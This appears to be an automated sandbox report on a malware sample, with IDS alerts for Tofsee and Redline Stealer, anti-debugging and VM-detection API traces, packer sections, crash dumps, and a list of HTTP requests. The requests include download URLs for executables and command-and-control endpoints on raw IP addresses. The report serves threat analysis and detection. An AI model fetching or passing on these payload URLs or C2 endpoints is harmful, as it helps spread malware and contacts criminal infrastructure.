TCP 192.168.56.103:49290 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49300	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49330 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49335 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.225.73.32:44973 -> 192.168.56.103:49241	2046056	ET MALWARE Redline Stealer Activity (Response)	A Network Trojan was detected
TCP 185.225.73.32:44973 -> 192.168.56.103:49241	2046106	ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Response)	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49349 -> 156.236.72.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49245 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49171 87.240.132.78:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.103:49186 172.67.197.101:443	C=US, O=Let's Encrypt, CN=E1	CN=preconcert.pw	60:b2:a3:3e:2f:80:57:cd:6f:c1:a3:e9:b3:c6:cb:95:41:83:4a:64
TLSv1 192.168.56.103:49184 172.67.214.144:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=sergejbukotko.com	f1:9c:9e:67:d8:1b:22:61:4a:4d:a0:fc:b3:45:84:76:9e:9d:2d:27
TLSv1 192.168.56.103:49164 104.26.8.59:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	92:b4:ed:98:67:d9:db:8a:1e:bd:0e:fe:7f:22:45:e9:79:b5:78:65
TLSv1 192.168.56.103:49190 104.21.95.210:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=verypayment.net	bb:8c:d6:7d:de:34:56:31:72:a3:92:eb:2e:e0:8f:ce:79:20:e6:b2
TLSv1 192.168.56.103:49205 87.240.132.78:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.103:49215 87.240.137.134:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1 192.168.56.103:49212 87.240.132.78:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.103:49220 95.142.206.1:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1 192.168.56.103:49218 95.142.206.0:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1 192.168.56.103:49217 87.240.132.78:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.103:49221 95.142.206.3:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1 192.168.56.103:49286 87.240.129.133:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.103:49326 87.240.129.133:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.103:49216 87.240.132.78:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.103:49213 87.240.132.78:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.103:49219 87.240.132.78:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.103:49334 87.240.129.133:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.103:49336 87.240.137.140:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1 192.168.56.103:49234 104.26.8.59:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	92:b4:ed:98:67:d9:db:8a:1e:bd:0e:fe:7f:22:45:e9:79:b5:78:65

Queries for the computername (10 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 14, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (8 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 14, 2023, 7:16 p.m.			0	0
IsDebuggerPresent Sept. 14, 2023, 7:16 p.m.			0	0
IsDebuggerPresent Sept. 14, 2023, 7:16 p.m.			0	0
IsDebuggerPresent Sept. 14, 2023, 7:16 p.m.			0	0
IsDebuggerPresent Sept. 14, 2023, 7:16 p.m.			0	0
IsDebuggerPresent Sept. 14, 2023, 7:16 p.m.			0	0
IsDebuggerPresent Sept. 14, 2023, 7:16 p.m.			0	0
IsDebuggerPresent Sept. 14, 2023, 7:16 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (20 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00843ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00843ae8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00843b68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ff768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ff768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ff768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ff768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ff7e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ff7e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ff6e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ff6e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ff6e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ff6e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ff6e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ff768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ff768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ff968 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0089f0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0089f0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2023, 7:16 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0089f170 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 14, 2023, 7:16 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (4 events)

section	_RDATA
section	.vmp0
section	.vmp1
section	.vmp2

One or more processes crashed (3 events)

Time & API	Arguments	Status
__exception__ Sept. 14, 2023, 7:16 p.m.	stacktrace: 0xb17de0 0xb17d15 0xb136fa 0xb133a6 0xb11b93 0xb11b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7469f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74797f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74794de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb17e79 registers.esp: 4254892 registers.edi: 42108140 registers.eax: 0 registers.ebp: 4254916 registers.edx: 8479584 registers.ebx: 42108160 registers.esi: 42108960 registers.ecx: 0	1
__exception__ Sept. 14, 2023, 7:16 p.m.	stacktrace: 0x5cd269 0x5cd06b 0x5c7ad8 0x5c72d3 0x5c3c6b 0x5c35d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7469f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74797f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74794de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5cd3a0 registers.esp: 1894980 registers.edi: 1895032 registers.eax: 0 registers.ebp: 1895044 registers.edx: 2974560 registers.ebx: 1896476 registers.esi: 37226036 registers.ecx: 0	1
__exception__ Sept. 14, 2023, 7:16 p.m.	stacktrace: 0xaa7800 0xaa7735 0xaa347b 0xaa3126 0xaa1b93 0xaa1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7469f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74797f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74794de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaa7899 registers.esp: 6615884 registers.edi: 41956584 registers.eax: 0 registers.ebp: 6615908 registers.edx: 8921200 registers.ebx: 41956604 registers.esi: 41957404 registers.ecx: 0	1

Time & API

Arguments

Status

Return

Repeated

__exception__

Sept. 14, 2023, 7:16 p.m.

stacktrace:

0xb17de0
0xb17d15
0xb136fa
0xb133a6
0xb11b93
0xb11b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7469f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74797f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74794de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb17e79
registers.esp: 4254892
registers.edi: 42108140
registers.eax: 0
registers.ebp: 4254916
registers.edx: 8479584
registers.ebx: 42108160
registers.esi: 42108960
registers.ecx: 0

__exception__

Sept. 14, 2023, 7:16 p.m.

stacktrace:

0x5cd269
0x5cd06b
0x5c7ad8
0x5c72d3
0x5c3c6b
0x5c35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7469f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74797f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74794de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5cd3a0
registers.esp: 1894980
registers.edi: 1895032
registers.eax: 0
registers.ebp: 1895044
registers.edx: 2974560
registers.ebx: 1896476
registers.esi: 37226036
registers.ecx: 0

__exception__

Sept. 14, 2023, 7:16 p.m.

stacktrace:

0xaa7800
0xaa7735
0xaa347b
0xaa3126
0xaa1b93
0xaa1b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7469f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74797f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74794de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xaa7899
registers.esp: 6615884
registers.edi: 41956584
registers.eax: 0
registers.ebp: 6615908
registers.edx: 8921200
registers.ebx: 41956604
registers.esi: 41957404
registers.ecx: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (6 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://193.42.32.118/api/tracemap.php
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://193.42.32.118/api/firegate.php
suspicious_features	Connection to IP address	suspicious_request	GET http://45.15.156.229/api/tracemap.php
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://45.15.156.229/api/firegate.php
suspicious_features	Connection to IP address	suspicious_request	HEAD http://45.9.74.80/super.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://45.9.74.80/super.exe

Performs some HTTP requests (33 events)

request	GET http://193.42.32.118/api/tracemap.php
request	POST http://193.42.32.118/api/firegate.php
request	HEAD http://ji.alie3ksgbb.com/m/ela205.exe
request	GET http://ji.alie3ksgbb.com/m/ela205.exe
request	HEAD http://marrakechchoralmeeting.ma/netTime.exe
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	HEAD http://marrakechchoralmeeting.ma/cgi-sys/suspendedpage.cgi
request	GET http://marrakechchoralmeeting.ma/netTime.exe
request	GET http://marrakechchoralmeeting.ma/cgi-sys/suspendedpage.cgi
request	GET http://45.15.156.229/api/tracemap.php
request	POST http://45.15.156.229/api/firegate.php
request	HEAD http://45.9.74.80/super.exe
request	GET http://45.9.74.80/super.exe
request	HEAD http://230907161118223.nmr.xrm42.top/f/fikim0907223.exe
request	GET http://230907161118223.nmr.xrm42.top/f/fikim0907223.exe
request	GET https://api.myip.com/
request	GET https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1
request	GET https://sergejbukotko.com/7725eaa6592c80f8124e769b4e8a07f7.exe
request	GET https://preconcert.pw/setup294.exe
request	GET https://verypayment.net/1bc7618fb98d2d4c287a4f9d42a3529b/7725eaa6592c80f8124e769b4e8a07f7.exe
request	GET https://vk.com/doc44017378_668850966?hash=seNAc9XpZGb24lXnAxVAwPiPVaSTe6IiTQaY7IFhggw&dl=A9mazd4TmUx700iSSJAZzZTPnbX30hG5PEtIhQs2FVw&api=1&no_preview=1#utube
request	GET https://vk.com/doc17799268_667374166?hash=t73r7TZmjqi4mQ6K8CuchmsQ2lbq7RbjhwFx1c1Azcg&dl=HaU76slkxIDZ6fTldzxVLdSFmSzwAiccfTBkzLQsA4D&api=1&no_preview=1#u9
request	GET https://psv4.userapi.com/c909518/u17799268/docs/d38/272bd98cd010/h27lmi0.bmp?extra=8E5LnE31GAfkun85y6q3JNHdEJ6rb3OS4of8U197zzjPBwzlcBmXiYtqfGEzAOOcBigBbtsjBtCJpKZMK3_lQTtjrrC6bCw4QqmXuSbFcrs-fVc_0h4X8B-FoNEyrA4yLWeFIUw2C7A5wlE2
request	GET https://vk.com/doc17799268_667370950?hash=kmRsdqMou4vNz1YzodkAQZcJxKjXdXHF3v2Zycf1w2H&dl=i4K7yr2wzDFn7JZ4az5BAF7ZSXsQBGNbt8o8BOvxSaw&api=1&no_preview=1
request	GET https://sun6-20.userapi.com/c237031/u17799268/docs/d44/9d7023004930/PL_Client.bmp?extra=X1aJqe75cj3wH63JyDtM4ZvEFrLEEDM9Cj69lrcSXLQLpLhAVquotaOP2hnr-i131Cw2CXTQYaZGiXrawiBA3-dvrSYSkiKl6gd5nnzy6xUssRlZdOecvfBwEwrAygIbNtWImtAz1AfD6bvt
request	GET https://vk.com/doc17799268_667301259?hash=mz2nLKvo6dt1uE06v4jRORCgXO1tbK1pSlJhEfMFJco&dl=vkt89M90dzWpJZ9hvFWUTeZuZHqaxeSpP8mP7ffY8Z0&api=1&no_preview=1
